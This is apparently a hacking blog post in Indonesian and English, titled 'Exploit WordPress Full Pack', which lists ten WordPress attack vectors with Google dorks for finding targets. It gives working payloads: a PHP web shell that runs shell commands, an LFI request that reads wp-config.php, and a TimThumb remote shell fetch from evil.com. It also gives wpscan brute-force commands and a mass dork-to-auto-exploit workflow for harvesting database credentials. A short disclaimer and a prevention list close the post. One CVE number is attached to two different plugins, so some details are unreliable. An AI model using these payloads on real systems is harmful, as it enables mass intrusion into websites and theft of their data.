Exploit WordPress Full Pack

[+] Exploit WordPress Full Pack

Author: 0x6ick

1. WP_File_Manager RCE (CVE-2020-25213 + CVE-2025-0818)

Dork: inurl:/wp-content/plugins/wp-file-manager/

Exploit Path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

CVE Terbaru: CVE-2025-0818 - Arbitrary File Deletion

Langkah: Upload shell → akses via URL → full control!

Detection: Check plugin version ≤ 6.9

2. Slider Revolution LFI (CVE-2025-9217)

Dork: inurl:wp-content/plugins/revslider

Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php [Legacy Method]

Exploit Terbaru: Parameter used_svg dan used_images

Access Level: Contributor+ (Authenticated)

Impact: Read sensitive files (wp-config.php, etc.)

3. Database for Contact Forms RCE (CVE-2025-7384)

Dork: inurl:wp-content/plugins/database-contact-form-7

CVSS: 9.8 (CRITICAL)

Exploit: PHP Object Injection → Remote Code Execution

Installations: 70,000+ sites affected

Langkah: Serialized payload injection → chain gadgets → RCE

4. Advanced File Manager Arbitrary Deletion (CVE-2025-0818)

Dork: inurl:wp-content/plugins/advanced-file-manager

Exploit: Path traversal via elFinder ≤ 2.1.64

Impact: Delete arbitrary files including wp-config.php

5. Theme Editor Backdoor Injection

Dork: intitle:"Site Admin" inurl:/wp-login.php

Prerequisites: Admin access + theme editor enabled

Exploit: Edit footer.php atau functions.php

Langkah: Sisipkan shell base64 → decode via parameter → persistent access

Payload Example:

<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>

Baca juga artikel: exploit joomla full pack

6. XML-RPC Bruteforce & DDoS

Dork: inurl:xmlrpc.php

Exploit: system.multicall untuk multiple auth attempts

Tools: wpscan --enumerate u --password-attack xmlrpc

Impact: Account takeover + amplification attacks

7. WP_Forms Data Exfiltration

Dork: inurl:wp-content/uploads/wpforms

Exploit: Unprotected form submissions containing sensitive data

Langkah: Directory traversal → download .sql/.csv files

8. TimThumb Cache Poisoning

Dork: inurl:timthumb.php?src=

Exploit: timthumb.php?src=http://evil.com/shell.txt&w=100&h=100

Langkah: Remote shell disimpan cache → akses via path cache

Detection: File contains remote URL fetching

9. Plugin Mass Scanner Integration

Tools: wpscan, nuclei, whatweb

Workflow: Dork target → scan plugin → fetch CVE → auto-exploit

Custom Scanner: Gunakan script mass checker untuk bulk verification

10. WP_Config Database Credential Harvesting

Techniques: LFI, backup file discovery, exposed .git/.svn

Langkah: Dump wp-config.php → extract DB credentials → direct database access

Tools & Automation Scripts

Mass Checker: Mass Checker Update

WPScan: wpscan --url TARGET --enumerate p --plugins-detection mixed

Nuclei Templates: Pre-built templates for WordPress vulnerabilities

Custom Exploit: Auto-generate payloads based on CVE


⚠️ Disclaimer

This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this content.

📊 Detection & Prevention

Patch Management: Update WordPress core dan plugin secara berkala

WAF Configuration: Implementasi Web Application Firewall

Monitoring: File integrity checks + log analysis

Hardening: Disable file editor, restrict XML-RPC, etc.


"Where creativity, exploitation, and expression collide." — 6ickZone

Post a Comment

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About